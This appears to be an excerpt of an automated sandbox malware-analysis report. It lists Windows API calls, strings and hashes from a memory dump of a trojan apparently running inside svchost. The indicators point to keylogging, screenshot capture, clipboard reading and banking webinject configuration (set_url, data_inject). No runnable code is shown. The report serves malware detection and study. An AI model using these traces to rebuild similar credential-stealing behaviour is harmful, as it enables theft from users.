                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                                • String ID: 5E8DC3C1$\$inter.zip$path.txt
                                                                                                                                                                                                                • API String ID: 3082343898-1471523162
                                                                                                                                                                                                                • Opcode ID: 690bac372c4864bde2fd6941af65324238cc72596d3bf6de2ad57a507d31511f
                                                                                                                                                                                                                • Instruction ID: 9481e43f22e23320650ce0c1c8aa7494e634c5c77cb8dbe2ed65a21cc34d1449
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690bac372c4864bde2fd6941af65324238cc72596d3bf6de2ad57a507d31511f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E6126309006599FDB25CB24A8ACBEB7BE4EF45301F544594EAC9DB341EF719D88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc0d9,00000000,00000001), ref: 02D3B0F6
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02D7D788,00000000), ref: 02D3B131
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3B137
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3B13F
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02D7D788), ref: 02D3B14E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3B155
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D3B18B
                                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,02D7D788,00000000), ref: 02D3B1C3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D3B1D6
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D3B1E7
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3B1EA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3B1FC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorLastMutexPathSleep$AdminBackslashCopyDirectoryFileFolderHandleInformationMakeReleaseSystemUser
                                                                                                                                                                                                                • String ID: 5e8dc0d9$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                                • API String ID: 2754757069-932628129
                                                                                                                                                                                                                • Opcode ID: 85c1e1921f22277fef84f47fe69f617b6991f92a73cc74177a54ed93cfaab52b
                                                                                                                                                                                                                • Instruction ID: ef388a7ea4e211c0980367e3bc0b901a2eab97025789eed94feb1c6846706a60
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85c1e1921f22277fef84f47fe69f617b6991f92a73cc74177a54ed93cfaab52b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB412631A40655ABEB220B34FC6DBAB3BD6EF46749F584546E886CB380DB74CD44C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02D2C32C
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2C34D
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2C350
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 02D2C355
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 02D2C364
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2C377
                                                                                                                                                                                                                • GetClassNameA.USER32(00000000,?,00000101), ref: 02D2C399
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02D2C405
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D2C427
                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D2C436
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02D2C43F
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2C452
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D2C462
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D2C476
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 02D2C47E
                                                                                                                                                                                                                • EnumChildWindows.USER32(00000000,02D2C2A0,00000000), ref: 02D2C48C
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02D2C495
                                                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 02D2C4A3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildDesktopEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 2886700239-4251816714
                                                                                                                                                                                                                • Opcode ID: c3839df5e2feceb905a4f2b294e22a6107e41630faf90740e469cdc607d6ec25
                                                                                                                                                                                                                • Instruction ID: b6dddf47e1f27a672a3e8c059e74a65fb79137e6a065116d0885aad894b9c7d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3839df5e2feceb905a4f2b294e22a6107e41630faf90740e469cdc607d6ec25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67411730A90624AFE7209B64EC4DFBE3728EF15B59F400A06F581E63C0D7B4AE55C674
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D32060: memset.MSVCRT ref: 02D32082
                                                                                                                                                                                                                  • Part of subcall function 02D32060: GetParent.USER32(?), ref: 02D3208E
                                                                                                                                                                                                                  • Part of subcall function 02D32060: GetWindowTextW.USER32(00000000,?,00000104), ref: 02D320A5
                                                                                                                                                                                                                  • Part of subcall function 02D32060: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D320C6
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB38,?,?), ref: 02D32136
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02D32164
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,?), ref: 02D32178
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D32189
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3218F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D32198
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D321A9
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02D321B3
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,keygrab), ref: 02D321C5
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D321D0
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D321D6
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D321DE
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D321EF
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D321F6
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D32203
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D32233
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB38,?), ref: 02D32253
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                                • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                                • API String ID: 2122597915-4222822809
                                                                                                                                                                                                                • Opcode ID: f69e06b1cbdfd30e17a97c6eac0c0aeb1acfc0b6ac3481445d9b62cacdf46865
                                                                                                                                                                                                                • Instruction ID: a8d066d3e097764e446edc936e99ae9cb40562f5a52a3151a5362009682d9304
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69e06b1cbdfd30e17a97c6eac0c0aeb1acfc0b6ac3481445d9b62cacdf46865
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3318D76940219ABDB10DBB4EC4CAE977B8EF48700F548994E989D7300DBB4DDD5CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB20,00000000,00000000,00000000,?,02D31799), ref: 02D31090
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,?,02D31799), ref: 02D310F8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D31799), ref: 02D310FF
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D3117F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D31199
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D311B3
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D311CD
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D311F7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02D31214
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D3121B
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D31344
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3137C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3137F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3138C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D3138F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB20,?,02D31799), ref: 02D3139A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                                • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                                • API String ID: 2387113551-2328515424
                                                                                                                                                                                                                • Opcode ID: ab0243a95cd279a8a96cb9282865024bf28d90c8b5e92b358c1430cb9ed0d9e1
                                                                                                                                                                                                                • Instruction ID: 212d1194dc23251ddf53504e98a1a77a20f0700b95433cc474bbb0e453b23f0d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab0243a95cd279a8a96cb9282865024bf28d90c8b5e92b358c1430cb9ed0d9e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7A1F375A043429FDB22CF34D4987A67FE1EF45304F1885A9D88A8B345EB71DE49CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000), ref: 02D483F9
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 02D48416
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleInformationType
                                                                                                                                                                                                                • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                                • API String ID: 4064226416-1748840775
                                                                                                                                                                                                                • Opcode ID: db84ddbcb2e0b04d971398fa3e6f5a235546d0c291e291bae361133d899397fe
                                                                                                                                                                                                                • Instruction ID: 1d4966bff961fcc7de8ed0212733011f6eca0fd9fc72ce0ded7a622d461423bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: db84ddbcb2e0b04d971398fa3e6f5a235546d0c291e291bae361133d899397fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A518071D40218ABDB14CFA4DC84FBEBBB9FB44744F54851AEA04EB280DB749D40DBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32E4D
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02D32E6E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D32E8F
                                                                                                                                                                                                                • GetGUIThreadInfo.USER32(00000000), ref: 02D32E96
                                                                                                                                                                                                                • GetOpenClipboardWindow.USER32 ref: 02D32EAC
                                                                                                                                                                                                                • GetActiveWindow.USER32 ref: 02D32EBA
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02D32EE8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02D32F0A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D32F11
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32F21
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02D32F3E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32F8B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D32F8E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32F9B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D32F9E
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02D32FA9
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02D32FEF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 3472172748-4108050209
                                                                                                                                                                                                                • Opcode ID: ffab22cd4f95a8bdbf66e6913f6937ecd56c334e3a82bf24ccea778433084cba
                                                                                                                                                                                                                • Instruction ID: c1be43753f43aaec3bbee4ce7f046668e3af5a8ef0b0886d5be41c9adbb9764a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffab22cd4f95a8bdbf66e6913f6937ecd56c334e3a82bf24ccea778433084cba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C51F171A443026BD7269B69EC8CB6B7BA9EF8A714F100618FD45D73C0DB61DD08CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2C34D
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2C350
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 02D2C355
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 02D2C364
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2C377
                                                                                                                                                                                                                • GetClassNameA.USER32(00000000,?,00000101), ref: 02D2C399
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02D2C405
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D2C427
                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D2C436
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02D2C43F
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2C452
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D2C462
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D2C476
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 02D2C47E
                                                                                                                                                                                                                • EnumChildWindows.USER32(00000000,02D2C2A0,00000000), ref: 02D2C48C
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02D2C495
                                                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 02D2C4A3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 1978407388-4251816714
                                                                                                                                                                                                                • Opcode ID: 5313b71f4fca24b5b4f8db439cefb57c21a4fa8c26cfc69e5295d0704f8d8bf2
                                                                                                                                                                                                                • Instruction ID: c95570a8b41989a76e62a2def19729cd7f55dfa8ec28593ccaeae20cdf0b1b50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5313b71f4fca24b5b4f8db439cefb57c21a4fa8c26cfc69e5295d0704f8d8bf2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D312A30A906216FE7309B60EC4EFBF3728EF15749F500A05F682E52C0C7A4AE55C678
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75B07390,?,02D2148C,00000000,?), ref: 02D4020A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,02D2148C,00000000,?), ref: 02D40229
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D40230
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D40248
                                                                                                                                                                                                                • SetFilePointer.KERNEL32 ref: 02D40263
                                                                                                                                                                                                                • LockFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02D40274
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02D40284
                                                                                                                                                                                                                • UnlockFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D40299
                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02D402B2
                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02D402BE
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75B07390,?,02D2148C,00000000,?), ref: 02D402DB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D402EE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D402F1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D402FE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D40301
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Pointer$AllocFreeLockReadSizeUnlockValidatememset
                                                                                                                                                                                                                • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                                • API String ID: 373673121-4158457813
                                                                                                                                                                                                                • Opcode ID: a6d28f69e48ef2f1e803062ed174324a28e5dcb16340db0db7c332a86ae30f37
                                                                                                                                                                                                                • Instruction ID: 40aadfe9bebd87b874c21b81afa3f9e794b7b21c143122bac672e1eac836691c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6d28f69e48ef2f1e803062ed174324a28e5dcb16340db0db7c332a86ae30f37
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3531AF71945300ABE3209F64AC8DF2BBBACEF48B05F544A19FA44E6280DB70DD54CBB5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc356), ref: 02D412C7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41315
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41321
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41325
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41336
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D4133D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D41370
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4137F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D41385
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D41389
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D4139A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D413A1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D413CF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D413E5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5e8dc356$scrs
                                                                                                                                                                                                                • API String ID: 1455050916-628881103
                                                                                                                                                                                                                • Opcode ID: 54cd61a7a5f578c248c9d06060558566583b3b78f531c01dbcb05e7201c7df7e
                                                                                                                                                                                                                • Instruction ID: afb0054dd8cbb71c4990d1175a9c1b87b4850e31c70e00805b10c7aea919a0c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54cd61a7a5f578c248c9d06060558566583b3b78f531c01dbcb05e7201c7df7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C731F3759402199FCB20DB74A89CBEA77A8AB49744F844594E9CAD7300EF70DDD4CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C217
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C265
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3C271
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3C275
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C286
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3C28D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02D3C2C0
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C2CF
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D3C2D5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3C2D9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C2EA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D3C2F1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D3C31F
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02D3C335
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$5E8DC08D$scrs
